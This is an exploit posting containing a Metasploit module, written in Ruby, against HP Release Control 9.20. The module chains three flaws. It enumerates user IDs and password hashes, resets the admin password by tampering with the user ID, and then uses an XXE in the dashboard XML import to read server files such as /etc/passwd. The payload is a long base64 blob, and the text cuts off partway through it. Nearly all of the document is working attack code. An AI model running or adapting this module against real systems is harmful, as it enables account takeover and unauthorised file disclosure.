HP Release Control 9.20.0000 Build 395 XXE Exploit

2014.05.19
Credit: Brandon
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'HP Release Control Authenticated XXE', 'Description' => %q{ This module take advantage of three separate vulnerabilities in order to read an arbitrary text file from the file system with the privileges of the web server. You must be authenticated, but can be unprivileged since a privilege escalation vulnerability is used. Tested against HP Release Control 9.20.0000, Build 395 installed with demo data. The first vulnerability allows an unprivileged authenticated user to list the current users, their IDs, and even their password hashes. Can't login with hashes, but the ID is useful in the second vulnerability. When a user changes their password, they post the ID of the user who is going to have their password changed. Just replace it with the admin ID and you change the admin password. You are now admin. The third vulnerability is an XXE in the dashboard XML import mechanism. This is what allows you to read the file from the file system. This module is super ghetto half because it was an AMF application, half because I worked on it longer than I wanted to. }, 'License' => MSF_LICENSE, 'Author' => [ 'Brandon Perry <bperry.volatile [at] gmail.com>' ], 'References' => [ ], 'DisclosureDate' => 'May 16 2014' )) register_options( [ OptString.new('TARGETURI', [ true, "Base directory path", '/']), OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]), OptString.new('USERNAME', [true, "The username to authenticate with", "username"]), OptString.new('PASSWORD', [true, "The password to authenticate with", "password"]) ], self.class) end def check end def run print_status("Authenticating") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) }) cookie = res.get_cookies post = { 'j_username' => datastore['USERNAME'], 'j_password' => datastore['PASSWORD'], 'buttonName' => '' } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ccm', 'j_spring_security_check'), 'method' => 'POST', 'vars_post' => post, 'cookie' => cookie }) if res and res.headers['Location'] !~ /index.jsp/ fail_with("Authentication failed") end cookie = res.get_cookies res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ccm', 'index.jsp'), 'cookie' => cookie }) cookie = cookie + res.get_cookies #not sure why this always fails the first time. Whatever. id = nil while id == nil id = get_admin_id(cookie) end print_status("Found admin id: " + id) print_status("Changing admin's password...") password = change_admin_password(cookie, id) print_status("Changed admin password to: " + password) post = { 'j_username' => 'admin', 'j_password' => password, 'buttonName' => '' } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) }) cookie = res.get_cookies res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ccm', 'j_spring_security_check'), 'method' => 'POST', 'vars_post' => post, 'cookie' => cookie }) if res.headers['Location'] !~ /index.jsp/ fail_with("Login failed") end cookie = res.get_cookies res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ccm', 'index.jsp'), 'cookie' => cookie }) cookie = cookie + res.get_cookies post = { 'com.mercury.dashboard.screen_resolution_width' => 2560, 'com.mercury.dashboard.arch.fieldtree.date.timeZone' => 300, 'com.mercury.dashboard.arch.fieldtree.date.zeroTimeUser' => 1400274351481 } #need to send this so that the next request doesn't fail res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'portal', 'PageView.jsp'), 'method' => 'POST', 'vars_post' => post, 'cookie' => cookie }) print_status("Exploiting XXE...") data = Rex::Text::decode_base64("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJjb20ubWVyY3VyeS5kYXNoYm9hcmQuYXJjaC5maWVsZHRyZWUuZm9ybUZvckZpZWxkdHJlZS4iDQoNClkNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ2MjcwNzY2NzE0ODI0NTIwNjA0NjY0OTk5MjYNCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iLmltcG9ydEZyb21GaWxlIjsgZmlsZW5hbWU9IkRhc2hib2FyZF9PYmplY3RzX0V4cG9ydF8yMDE0MDUxNC54bWwiDQpDb250ZW50LVR5cGU6IHRleHQveG1sDQoNCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04IiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgZm9vIFsKICAgPCFFTEVNRU5UIGZvbyBBTlkgPgogICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiID5dPgo8RXhwb3J0TGlzdCB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIj48dmVyc2lvbj4yPC92ZXJzaW9uPjxNb2R1bGU+PG5hbWU+UmVsZWFzZSBDb250cm9sIERlZmF1bHQgTW9kdWxlPC9uYW1lPjx1dWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC91dWlkPjxkZXNjcmlwdGlvbj4meHhlOzwvZGVzY3JpcHRpb24+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48YWxsb3dTZWxmU2VydmljZT5mYWxzZTwvYWxsb3dTZWxmU2VydmljZT48Y29waWFibGU+dHJ1ZTwvY29waWFibGU+PGFsbFVzZXJzQWNjZXNzPnRydWU8L2FsbFVzZXJzQWNjZXNzPjxwYWdlPjxwYWdlU2VxdWVuY2U+MDwvcGFnZVNlcXVlbmNlPjx0aXRsZT5UcmVuZHM8L3RpdGxlPjxwb3J0bGV0Pjx0aXRsZT5MYXRlbnQgQ2hhbmdlcyBPdmVyIFRpbWU8L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+M2I3YmI2YWEwMjk3N2Y1Yzo2OTQwMjEwYjoxMTYzYmNiMzk0YTotN2ZkZjwvcG9ydGxldERlZmluaXRpb25VdWlkPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+ZGlzcGxheVByZWZTdW1tYXJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5GaWx0ZXI8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzI5NDkxOF1bTGF0ZW50XTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPkdyb3VwIEJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlt3ZWVrXVtXZWVrXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmNvbS5tZXJjdXJ5LmRhc2hib2FyZC5hcHAucG9ydGFsLmlzV2lkZVBvcnRsZXQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+dHJ1ZTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0Um93PjI8L2xheW91dFJvdz48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGlzTWluaW1pemVkPmZhbHNlPC9pc01pbmltaXplZD48aXNQb3J0bGV0Q29tbT5mYWxzZTwvaXNQb3J0bGV0Q29tbT48L3BvcnRsZXQ+PHBvcnRsZXQ+PHRpdGxlPkFibm9ybWFsIENoYW5nZXMgT3ZlciBUaW1lPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjMyOWM4MTJjNTE3ODNlOWU6NmE5NTIwZjM6MTE2Mzk4MTdkYTI6LTdmZWI8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPnBvcnRsZXRFZGl0ZWQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+RmlsdGVyPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsyOTQ5MTJdW0FueV08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bd2Vla11bV2Vla108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4xPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5DaGFuZ2VzIE92ZXIgVGltZTwvdGl0bGU+PHBvcnRsZXREZWZpbml0aW9uVXVpZD4zMjljODEyYzUxNzgzZTllOjZhOTUyMGYzOjExNjM5ODE3ZGEyOi03ZmVjPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5wb3J0bGV0RWRpdGVkPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPkZpbHRlcjwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bMjk0OTEyXVtBbnldPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W3dlZWtdW1dlZWtdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+Y29tLm1lcmN1cnkuZGFzaGJvYXJkLmFwcC5wb3J0YWwuaXNXaWRlUG9ydGxldDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT50cnVlPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48aXNNaW5pbWl6ZWQ+ZmFsc2U8L2lzTWluaW1pemVkPjxpc1BvcnRsZXRDb21tPmZhbHNlPC9pc1BvcnRsZXRDb21tPjwvcG9ydGxldD48YXV0b1JlZnJlc2g+ZmFsc2U8L2F1dG9SZWZyZXNoPjxyZWZyZXNoSW50ZXJ2YWw+MDwvcmVmcmVzaEludGVydmFsPjwvcGFnZT48cGFnZT48cGFnZVNlcXVlbmNlPjE8L3BhZ2VTZXF1ZW5jZT48dGl0bGU+QW5hbHlzaXM8L3RpdGxlPjxwb3J0bGV0Pjx0aXRsZT5BcHBsaWNhdGlvbiBTZXZlcml0eSBEaXN0cmlidXRpb248L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTgwMDA8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W1BFTkRJTkdfQVBQUk9WQUxdW1BlbmRpbmcKCQkJCQkJCUFwcHJvdmFsXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlVzZXIgQXBwbGljYXRpb25zPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltZXVtZZXNdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+Y29tLm1lcmN1cnkuZGFzaGJvYXJkLmFwcC5wb3J0YWwuaXNXaWRlUG9ydGxldDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT50cnVlPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48aXNNaW5pbWl6ZWQ+ZmFsc2U8L2lzTWluaW1pemVkPjxpc1BvcnRsZXRDb21tPmZhbHNlPC9pc1BvcnRsZXRDb21tPjwvcG9ydGxldD48cG9ydGxldD48dGl0bGU+Q2hhbmdlIFJlcXVlc3QgSW1wYWN0IEFuYWx5c2lzIFJhdGlvPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZlPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlJlcXVlc3QgU3RhdHVzPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4yPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5BcHBsaWNhdGlvbiBTdGF0dXMgRGlzdHJpYnV0aW9uPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZmPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlVzZXIgQXBwbGljYXRpb25zPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltZXVtZZXNdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+VGltZSBGcmFtZTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bTGFzdCBNb250aF1bTGFzdCBNb250aF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4xPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0PjxhdXRvUmVmcmVzaD5mYWxzZTwvYXV0b1JlZnJlc2g+PHJlZnJlc2hJbnRlcnZhbD4wPC9yZWZyZXNoSW50ZXJ2YWw+PC9wYWdlPjxwYWdlPjxwYWdlU2VxdWVuY2U+MjwvcGFnZVNlcXVlbmNlPjx0aXRsZT5Qb3N0IEltcGxlbWVudGF0aW9uPC90aXRsZT48cG9ydGxldD48dGl0bGU+T3V0Y29tZSBPdmVyIFRpbWU8L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+NmEzNjczYzlmZWI3NmRjYjotMzYyNTYxNjY6MTE3MmIyOTE1YTI6LTdmZjQ8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPnBvcnRsZXRFZGl0ZWQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+RmlsdGVyPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsyOTQ5MjBdW0Nsb3NlZF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bd2Vla11bV2Vla108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5PdXRjb21lIEdyb3VwZWQgQnkgUmlzazwvdGl0bGU+PHBvcnRsZXREZWZpbml0aW9uVXVpZD42YTM2NzNjOWZlYjc2ZGNiOi01MTk3MDhjYzoxMTcyYmE1NzllZDotN2ZmMTwvcG9ydGxldERlZmluaXRpb25VdWlkPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+cG9ydGxldEVkaXRlZDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+ZGlzcGxheVByZWZTdW1tYXJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5GaWx0ZXI8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzI5NDkyMF1bQ2xvc2VkXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPk1pbmltdW4gVmFsdWU8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5JbnRlcnZhbDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bMTBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5NYXhpbXVtIFZhbHVlPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsxMDBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5OdW1lcmljIFR5cGU8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W2NhbGN1bGF0ZWQtcmlza11bY2FsY3VsYXRlZC1yaXNrXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmNvbS5tZXJjdXJ5LmRhc2hib2FyZC5hcHAucG9ydGFsLmlzV2lkZVBvcnRsZXQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+dHJ1ZTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0Um93PjE8L2xheW91dFJvdz48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGlzTWluaW1pemVkPmZhbHNlPC9pc01pbmltaXplZD48aXNQb3J0bGV0Q29tbT5mYWxzZTwvaXNQb3J0bGV0Q29tbT48L3BvcnRsZXQ+PGF1dG9SZWZyZXNoPmZhbHNlPC9hdXRvUmVmcmVzaD48cmVmcmVzaEludGVydmFsPjA8L3JlZnJlc2hJbnRlcnZhbD48L3BhZ2U+PC9Nb2R1bGU+PFBvcnRsZXREZWZpbml0aW9uPjxCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjxDaGFydFBvcnRsZXREZWZpbml0aW9uPjxCdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGRhdGFTb3VyY2U+PGlkPkNIQU5HRV9JTVBBQ1RfQU5BTFlTSVNfUkFUSU88L2lkPjxuYW1lPkNoYW5nZSBSZXF1ZXN0IEltcGFjdCBBbmFseXNpcyBSYXRpbzwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5SZXF1ZXN0IFN0YXR1czwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+ZGVmd2FmZHNhZmRzYTwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2U+U3RhdHVzIENvbG9yPC9jb2xvclNvdXJjZT48dG9vbHRpcFNvdXJjZT4jIFJlcXVlc3RzPC90b29sdGlwU291cmNlPjx0b29sdGlwQ29udGFpbnNIVE1MPmZhbHNlPC90b29sdGlwQ29udGFpbnNIVE1MPjxvcmllbnRhdGlvbj52ZXJ0aWNhbDwvb3JpZW50YXRpb24+PGh5cGVybGluaz48aHlwZXJsaW5rVHlwZT5ub0h5cGVybGluazwvaHlwZXJsaW5rVHlwZT48aHlwZXJsaW5rU291cmNlLz48L2h5cGVybGluaz48L0NoYXJ0UG9ydGxldERlZmluaXRpb24+PGJhck5hbWVTb3VyY2U+U3RhdHVzPC9iYXJOYW1lU291cmNlPjxiYXJBeGlzTGFiZWw+U3RhdHVzPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48L0JhckNoYXJ0UG9ydGxldERlZmluaXRpb24+PHR5cGU+QmFyQ2hhcnQ8L3R5cGU+PG5hbWU+Q2hhbmdlIFJlcXVlc3QgSW1wYWN0IEFuYWx5c2lzIFJhdGlvPC9uYW1lPjx1dWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZlPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPnRydWU8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PENoYXJ0UG9ydGxldERlZmluaXRpb